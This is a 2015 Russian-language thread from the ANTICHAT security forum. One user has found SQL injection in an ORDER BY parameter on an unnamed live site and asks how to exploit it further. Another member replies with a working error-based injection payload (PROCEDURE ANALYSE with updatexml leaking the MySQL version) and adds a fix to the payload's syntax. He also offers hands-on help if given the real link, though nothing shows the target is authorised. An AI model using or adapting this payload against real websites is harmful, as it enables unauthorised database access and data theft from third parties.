ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.04.2015, 15:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 12164
Репутация:
1
|
|
Нашел скулю, запрос http://xxx.com/cat/15?order=id&order_type=DESC
Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC
Выводит
A Database Error Occurred
Error Number: 1221
Incorrect usage of UNION and ORDER BY
SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50
Помогите дальше раскрутить.
|
|
|
|

06.04.2015, 15:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 12164
Репутация:
1
|
|
единственное, что сам сделал, так это
15?order=(id*1) и 15?order=(id*-1)
но вытащить никакие данные не могу
|
|
|
|

06.04.2015, 15:59
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от billybonse
billybonse said:
↑
Нашел скулю, запрос
http://xxx.com/cat/15?order=id&order_type=DESC
Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC
Выводит
A Database Error Occurred
Error Number: 1221
Incorrect usage of UNION and ORDER BY
SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50
Помогите дальше раскрутить.
может стоит начать со статей по sqli? можно, заодно, пройти челлендж, чтобы лучше понять /threads/423579/
|
|
|

06.04.2015, 16:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 12164
Репутация:
1
|
|
Спасибо за совет, статьи читал конечно же, в гугле смотрел, но сам не смог разобраться, поэтому и спросил в этой теме.
|
|
|
|

06.04.2015, 17:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
|
|
|

06.04.2015, 17:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 12164
Репутация:
1
|
|
faza02, это я понял, не могу сформировать запрос чтобы дальше крутить
|
|
|
|

06.04.2015, 17:33
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от billybonse
billybonse said:
↑
faza02, это я понял, не могу сформировать запрос чтобы дальше крутить
вроде там достаточно информации.
Код:
Code:
http://xxx.com/cat/15?order=1+LIMIT+0+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+updatexml(1,concat(0x3A,version()),1)))--+&order_type=DESC
|
|
|

06.04.2015, 17:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 12164
Репутация:
1
|
|
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 50' at line 5
SELECT * FROM (`items`) WHERE `category` = '10' AND `sold` = '0' ORDER BY `1` LIMIT 0 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), `1)))--` DESC LIMIT 50
|
|
|
|

06.04.2015, 17:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
знак комментария обязательно должен быть с пробелом в конце. если хотите, чтобы вам помогли, скиньте ссылку
|
|
|

06.04.2015, 17:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Не нужно здесь разводить такую переписку. Для этого есть другие средства.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|